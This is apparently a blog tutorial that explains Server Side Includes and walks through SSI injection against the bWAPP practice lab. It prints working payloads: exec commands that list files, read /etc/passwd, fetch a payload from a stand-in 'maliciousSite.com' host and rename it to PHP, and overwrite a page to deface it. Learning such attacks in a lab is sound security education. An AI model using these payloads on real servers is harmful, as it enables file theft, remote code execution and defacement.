What is Server side include
Before knowing what exactly it is, I would ask you a simple question. Let’s assume that you need to develop an application of 100 pages with dynamic content. And each page must have a Header, Footer, Logo. What would be your answer? How much time does it take to add header and footer in all the pages?
Here comes the feature so called Server Side Include (SSI). This is a time saving feature used for developing application with dynamic web content. The answer to the above question, to insert header, footer in all pages throughout the website we can use simple command ‘#include’ which inserts into another file. If we need to change anything in header, then we need to modify code in one single file. Web pages that contain SSIs often end with a .shtml extension where server understands that those pages that need to be processed.
Yes, this looks like a comment in HTML/XML but it’s not! This SSI varies from server to server(Linux to Windows). I am sharing few examples on servers which are Linux based.
Real time examples for SSI which would be displaying server specific information such as current server time, visitor’s IP address, document type
<!--#config timefmt="%A %d %B, %Y" --> <!--#echo var="DATE_LOCAL" --> <!--#echo var="LAST_MODIFIED"-->
Server side include Injection
As you already know about HTML injections, now let’s see what is SSI injection and the impact of it. By the above introduction of SSI, you know that it’s quite useful, time saving, reusable component. Yea, I do agree with you. But what if your application is in wrong hands. What could happen? It’s something beyond your imagination. Do you want to know what all we could do if the web server permits SSI execution without proper validation?
Now it’s time to launch over bee-box server. Login to bWAPP and select SSI injection. You should see two input fields first name and last name.
POST by providing some valid data and notice the behavior. You should see your ip address in the web page as shown below.
How does this application know about your IP address? Okay let’s check source code buddy.
So this code is used to display the ip address of the user. Now let’s try to inject something and see whether we can grab some sensitive data.
Here’re few commands
<!--#echo var="DATE_LOCAL"--> <!--#exec cmd="ls -al"--> <!--#exec cmd="cat /etc/passwd"--> <!--#echo var="DOCUMENT_URI" --> <!--#exec cmd="wget http://maliciousSite.com/payload.txt | rename payload.txt payload.php" -->
On injecting with one of the above commands, I could see data in /etc/passwd
We can also deface the web page with simple command
<!--#exec cmd="echo 'You are hacked!' > /var/www/bWAPP/documents/bee_ssii.htm" -->
Now browse the url http://yourIPAddress/bWAPP/documents/bee_ssii.htm
You should see the defaced page. This is nothing but website Defacement which ruins all your reputation.
So, this is all about Server side include injection. If I miss anything, please feel free to post comments below.